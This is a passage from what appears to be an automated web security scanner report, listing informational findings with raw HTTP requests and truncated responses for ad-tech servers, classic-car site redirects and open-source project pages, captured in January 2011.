GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
Cneonction: close
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 01:06:57 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1336

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUt
...[SNIP]...

30.34. http://classiccars.com/go/homepage_TOL.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://classiccars.com
Path:   /go/homepage_TOL.html

Request

GET /go/homepage_TOL.html HTTP/1.1
Host: classiccars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 13 Dec 2010 16:58:11 GMT
Accept-Ranges: bytes
ETag: "eff49eece69acb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=mBeKa6jyywEkAAAAMTE4YzJiNTgtYzA3YS00M2NmLWFkZDMtZDE0NWY5MmNkNDg1vRRJhjLK7TiHDgYHgyYmeh0F1bZQUjfZse1EhTXv5gM1; expires=Mon, 04-Apr-2011 09:12:28 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:32:27 GMT
Connection: close
Content-Length: 214

<html>
<head>
<meta http-equiv="refresh" content="0;url=http://classiccars.com/home.html?utm_source=traderonline&utm_medium=link&utm_content=home&utm_campaign=collector_cars">
</head>
<body>
</bo
...[SNIP]...

30.35. http://classiccars.com/go/research_TOL.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://classiccars.com
Path:   /go/research_TOL.html

Request

GET /go/research_TOL.html HTTP/1.1
Host: classiccars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 13 Dec 2010 17:00:02 GMT
Accept-Ranges: bytes
ETag: "784d2b2fe79acb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=QeQAbqjyywEkAAAAMTdhYWRhYjAtNzRjYy00MGIwLThiMjgtMmY2NGY4YWRlMDE1iXIicmpksJdeKD0NcJ0_gqHFR6NiQieOPVcTSHpyVg01; expires=Mon, 04-Apr-2011 09:12:32 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:32:31 GMT
Connection: close
Content-Length: 233

<html>
<head>
<meta http-equiv="refresh" content="0;url=http://classiccars.com/resource-guide/home.html?utm_source=traderonline&utm_medium=link&utm_content=research&utm_campaign=collector_cars">
</
...[SNIP]...

30.36. http://classiccars.com/go/sell_TOL.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://classiccars.com
Path:   /go/sell_TOL.html

Request

GET /go/sell_TOL.html HTTP/1.1
Host: classiccars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 13 Dec 2010 16:59:29 GMT
Accept-Ranges: bytes
ETag: "7530831be79acb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=Zp0XbajyywEkAAAAZWM2YzU2NDctMGQ0MS00NTRiLTg3MjAtODkyOWJlNTZkYjMwotiPvRfVPBCcZB-Roj_am2LclWLUcGsowsZZPIHjTQg1; expires=Mon, 04-Apr-2011 09:12:30 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:32:30 GMT
Connection: close
Content-Length: 214

<html>
<head>
<meta http-equiv="refresh" content="0;url=http://classiccars.com/sell.html?utm_source=traderonline&utm_medium=link&utm_content=sell&utm_campaign=collector_cars">
</head>
<body>
</bo
...[SNIP]...

30.37. http://dave.willfork.com/slrnface/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dave.willfork.com
Path:   /slrnface/

Request

GET /slrnface/ HTTP/1.1
Host: dave.willfork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:01:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=5b32519ccc82f0294fbd5165fdf92ac0; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=willfork.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 533313
Connection: close

<b-ua>

30.38. http://delb.opt.fimserve.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delb.opt.fimserve.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"10-1172631264000"
Last-Modified: Wed, 28 Feb 2007 02:54:24 GMT
Content-Type: text/html
Content-Length: 10
Date: Tue, 25 Jan 2011 13:09:45 GMT

Not found

30.39. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Request

GET /2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2584
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<!-- aol -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395" width = "1" height = "1" border = "0">
<img src="http://at.amgdgt.
...[SNIP]...

30.40. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11596989115@x92

Request

GET /2/B3DM/DLX/11596989115@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1549
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

30.41. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Request

GET /2/B3DM/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 915
Content-Type: text/html

<script>
var oas_d=new Date();
var oas_m=oas_d.getTime();

oas_d.setTime(oas_m+86400000);
document.cookie="dlx_20100929=set;expires="+oas_d.toGMTString()+";path=/;domain=.mookie1.com";

oas_d.s
...[SNIP]...

30.42. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.abbreviations.com/p.json

Request

GET /red/psi/sites/www.abbreviations.com/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=4d1ec56b7612a62c; dt=X; psc=4; di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; bt=;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 24 Jan 2011 22:35:31 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 23 Feb 2011 22:35:31 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 24 Jan 2011 22:35:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 22:35:31 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

30.43. http://famspam.com/facebox/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://famspam.com
Path:   /facebox/

Request

GET /facebox/ HTTP/1.1
Host: famspam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:35:39 GMT
Content-Type: text/html
Content-Length: 291
Last-Modified: Wed, 23 Jun 2010 18:40:47 GMT
Connection: close
Expires: Tue, 25 Jan 2011 22:35:39 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>http://defunkt.github.com/facebox/</title>
<meta http-equiv="refresh" content="0;url=http://defunkt.github.com/facebox/"></head>
<body>
<a href="ht
...[SNIP]...

30.44. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2819819;type=retar278;cat=autob211;ord=8268780936487.02? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 24 Jan 2011 21:06:42 GMT
Expires: Mon, 24 Jan 2011 21:06:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 303

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/j
...[SNIP]...

30.45. http://golded-plus.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://golded-plus.sourceforge.net
Path:   /

Request

GET / HTTP/1.1
Host: golded-plus.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:35:43 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sun, 12 Mar 2006 19:35:39 GMT
ETag: "2ea1-40ed154b5d8c0"
Accept-Ranges: bytes
Content-Length: 11937
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:35:43 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>GoldED+</title>
   <link rev=made href="mailto:asa@eed.miee.ru">
   <style type=text/css>
       .titlebar {
           font-
...[SNIP]...

30.46. http://grn.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grn.sourceforge.net
Path:   /

Request

GET / HTTP/1.1
Host: grn.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:35:56 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 14 Sep 2000 07:42:15 GMT
ETag: "409-37139a591c3c0"
Accept-Ranges: bytes
Content-Length: 1033
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:35:56 GMT

<html>
<head>
<title>GRN - Gnome ReadNews</title>
</head>
<body bgcolor="#ffffff" text="#000000" marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">

<P>
Gnome ReadNews is a Perl-extensible
...[SNIP]...

30.47. http://home.big.or.jp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.big.or.jp
Path:   /

Request

GET / HTTP/1.1
Host: home.big.or.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:24 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
Last-Modified: Thu, 06 Nov 2008 07:59:31 GMT
ETag: "7d43-71f-4912a3e3"
Accept-Ranges: bytes
Content-Length: 1823
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<Html Lang="ja">
<Head>
<META HTTP-EQUIV="refresh" CONTENT="15;url=http://home.big.jp/">
<Meta Name="keywords" Content=".C...^.[.l.b.g.v...o.C._.[ .....^...T.[.o.[ 1Gbps .....o.b.N.{.[.. .i..">
<Title
...[SNIP]...

30.48. http://hostedusa3.whoson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hostedusa3.whoson.com
Path:   /

Request

GET / HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File not found
Content-Type: text/html
Content-Length: 52

<html><body><p>File does not exist</p></body></html>

30.49. http://hostedusa3.whoson.com/include.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hostedusa3.whoson.com
Path:   /include.js

Request

GET /include.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats &amp; Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...

30.50. http://hostedusa3.whoson.com/invite.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hostedusa3.whoson.com
Path:   /invite.js

Request

GET /invite.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats &amp; Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...

30.51. http://husky.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://husky.sourceforge.net
Path:   /

Request

GET / HTTP/1.1
Host: husky.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:36:27 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sun, 07 Jan 2007 16:20:17 GMT
ETag: "2051-42675b0423240"
Accept-Ranges: bytes
Content-Length: 8273
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:36:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- This is the first part of every page here -->

<html>
<head>

<style type="text/css">
<!--
body {margin-top: 0; margin-left:
...[SNIP]...

30.52. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Request

GET /ptj HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WMQgDurvViCC?96j]`^R97vYErn/P%y7hV$-E>]QZwo$4KNAv/8Bif.W)@Ep8]r]Cyg_ofRS=83[A7^uy>nO*vPsV+<4T6e>%p9J?'OhPeH+Cb.*%ye8n70CgM50x.%X%nN!':o/2r24FH/[2b'Nk; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Tue, 25 Jan 2011 15:05:12 GMT
Content-Length: 134
Connection: close

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

30.53. http://ifmail.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ifmail.sourceforge.net
Path:   /

Request

GET / HTTP/1.1
Host: ifmail.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:36:35 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 27 Aug 2001 04:38:18 GMT
ETag: "1271-38c7b86a5a280"
Accept-Ranges: bytes
Content-Length: 4721
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:36:35 GMT

<HTML><HEAD><TITLE>
Ifmail - Fidonet to Internet mail and news gateway program
</TITLE></HEAD>

<BODY TEXT=white LINK=#ffff80 VLINK=#d0d020 BGCOLOR=#101050>

<CENTER>
<A href="http://sourceforge.net/"
...[SNIP]...

30.54. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 14599

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

30.55. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...

30.56. http://loadus.exelator.com/load/net.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
Content-Type: text/html
Date: Mon, 24 Jan 2011 21:07:10 GMT
Server: HTTP server
Content-Length: 368

